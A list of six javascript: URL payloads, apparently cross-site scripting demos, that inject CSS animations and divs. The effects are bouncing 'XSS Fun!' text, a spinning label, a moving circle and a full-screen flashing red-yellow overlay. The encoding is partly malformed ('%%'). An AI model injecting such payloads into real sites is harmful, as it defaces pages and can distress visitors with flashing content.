javascript:var%20style%20=%20document.createElement('style');%20style.innerHTML%20=%20'%40keyframes%20bounce%20{%200%%,%2020%%,%2050%%,%2080%%,%20100%%%20{transform:%20translateY(0);}%2040%%%20{transform:%20translateY(-150%%);}%2060%%%20{transform:%20translateY(-75%%);}%20}.bounce%20{animation:%20bounce%202s%20infinite;%20color:%20red;%20font-size:%202em;%20position:%20fixed;%20top:%2050%%;%20left:%2050%%;%20transform:%20translate(-50%%,%20-50%%);%20}';%20document.head.appendChild(style);%20var%20div%20=%20document.createElement('div');%20div.className%20=%20'bounce';%20div.innerText%20=%20'XSS%20Fun!';%20document.body.appendChild(div);

javascript:var%20style%20=%20document.createElement('style');%20style.innerHTML%20=%20'%40keyframes%20spin%20{%20from%20{transform:%20rotate(0deg);}%20to%20{transform:%20rotate(360deg);}%20}.spin%20{animation:%20spin%202s%20linear%20infinite;%20font-size:%202em;%20position:%20fixed;%20top:%2050%%;%20left:%2050%%;%20transform:%20translate(-50%%,%20-50%%);%20color:%20blue;%20}';%20document.head.appendChild(style);%20var%20div%20=%20document.createElement('div');%20div.className%20=%20'spin';%20div.innerText%20=%20'Spinning%20XSS!';%20document.body.appendChild(div);

javascript:var%20style%20=%20document.createElement('style');%20style.innerHTML%20=%20'%40keyframes%20move%20{%200%%%20{left:%200;%20top:%200;}%2025%%%20{left:%20100%%;%20top:%200;}%2050%%%20{left:%20100%%;%20top:%20100%%;}%2075%%%20{left:%200;%20top:%20100%%;}%20100%%%20{left:%200;%20top:%200;}%20}.move%20{animation:%20move%205s%20infinite;%20position:%20fixed;%20width:%20100px;%20height:%20100px;%20background-color:%20green;%20border-radius:%2050%%;%20}';%20document.head.appendChild(style);%20var%20div%20=%20document.createElement('div');%20div.className%20=%20'move';%20document.body.appendChild(div);

javascript:var%20style%20=%20document.createElement('style');%20style.innerHTML%20=%20'%40keyframes%20flash%20{%200%%,%20100%%%20{background-color:%20red;};%2050%%%20{background-color:%20yellow;}%20}.flash%20{animation:%20flash%201s%20infinite;%20width:%20100vw;%20height:%20100vh;%20position:%20fixed;%20top:%200;%20left:%200;%20z-index:%209999;%20}';%20document.head.appendChild(style);%20var%20div%20=%20document.createElement('div');%20div.className%20=%20'flash';%20document.body.appendChild(div);

javascript:(function()%7Bvar%20style%20=%20document.createElement('style');%20style.innerHTML%20=%20'%40keyframes%20bounce%20%7B0%%,%2020%%,%2050%%,%2080%%,%20100%%%20%7Btransform:%20translateY(0);%7D%2040%%%20%7Btransform:%20translateY(-150%%);%7D%2060%%%20%7Btransform:%20translateY(-75%%);%7D%7D%20.bounce%20%7Banimation:%20bounce%202s%20infinite;%20color:%20red;%20font-size:%202em;%20position:%20fixed;%20top:%2050%%;%20left:%2050%%;%20transform:%20translate(-50%%,%20-50%%);%7D';%20document.head.appendChild(style);%20var%20div%20=%20document.createElement('div');%20div.className%20=%20'bounce';%20div.innerText%20=%20'XSS%20Fun!';%20document.body.appendChild(div);%7D)();

javascript:(function()%7Bvar%20style%20=%20document.createElement('style');%20style.innerHTML%20=%20'%40keyframes%20spin%20%7Bfrom%20%7Btransform:%20rotate(0deg);%7D%20to%20%7Btransform:%20rotate(360deg);%7D%7D%20.spin%20%7Banimation:%20spin%202s%20linear%20infinite;%20font-size:%202em;%20position:%20fixed;%20top:%2050%%;%20left:%2050%%;%20transform:%20translate(-50%%,%20-50%%);%20color:%20blue;%7D';%20document.head.appendChild(style);%20var%20div%20=%20document.createElement('div');%20div.className%20=%20'spin';%20div.innerText%20=%20'Spinning%20XSS!';%20document.body.appendChild(div);%7D)();
